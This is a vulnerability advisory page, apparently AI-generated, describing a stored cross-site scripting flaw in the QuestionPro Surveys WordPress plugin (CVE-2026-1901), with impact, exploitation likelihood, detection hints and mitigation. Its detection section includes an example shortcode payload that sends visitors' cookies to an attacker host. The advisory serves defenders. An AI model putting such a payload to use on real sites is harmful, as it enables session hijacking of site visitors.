
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-1901 is a Stored Cross-Site Scripting (XSS) vulnerability in the QuestionPro Surveys plugin for WordPress. It affects all versions up to and including 1.0, stemming from insufficient input sanitization and output escaping on user-supplied attributes within the questionpro shortcode. Authenticated attackers with Contributor-level access or above can inject arbitrary web scripts into pages, which execute whenever a user visits the affected page. It carries a CVSS v3.1 base score of 6.4 (Medium) (Red Hat Advisory, Wordfence).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The vulnerability exists because the plugin's questionpro shortcode fails to properly sanitize user-supplied attributes before rendering them in HTML output, allowing malicious script content to be stored in the database and later served to site visitors. Exploitation requires an authenticated session with at least Contributor-level privileges, after which the attacker can embed a crafted shortcode containing a JavaScript payload in a post or page. The scope is changed, meaning the injected script executes in the context of other users' browsers rather than the attacker's own session (Red Hat Advisory, Wordfence).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of users who visit pages containing the injected shortcode, impacting both confidentiality and integrity. This can lead to session cookie theft, credential harvesting, defacement of page content, or redirection of users to malicious sites. Availability is not directly impacted, but the persistent nature of stored XSS means the payload remains active until removed, potentially affecting all site visitors including administrators (Red Hat Advisory).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2026-1901 as of the available data. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires authenticated access at the Contributor level or above, which limits the attack surface compared to unauthenticated vulnerabilities (Wordfence).
questionpro shortcode with a malicious attribute payload, for example: [questionpro attribute="\"><script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].wp-admin/post.php or the REST API from Contributor-level accounts containing questionpro shortcode content with suspicious attribute values (e.g., <script>, javascript:, encoded variants).<script> tags or JavaScript URIs stored in the wp_posts table within questionpro shortcode attributes.questionpro shortcode, potentially carrying cookie or session data in query parameters./wp-content/plugins/questionpro-surveys/) that may indicate secondary compromise.Users should update the QuestionPro Surveys plugin to a version beyond 1.0 if a patched release is available from the WordPress plugin repository. If no patch is yet available, site administrators should restrict the ability of Contributor-level users to publish or submit posts containing shortcodes, or temporarily deactivate the plugin. Implementing a Web Application Firewall (WAF) with XSS filtering rules can provide an additional layer of defense. Regularly auditing posts and pages for unexpected script content is also recommended (Wordfence).
Wordfence included CVE-2026-1901 in their weekly WordPress vulnerability report for the period of February 9–15, 2026, highlighting it as part of a broader set of plugin vulnerabilities tracked that week (Wordfence). Red Hat also published a security advisory referencing the CVE (Red Hat Advisory). No significant independent researcher commentary or broader media coverage has been identified beyond standard vulnerability aggregator listings.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."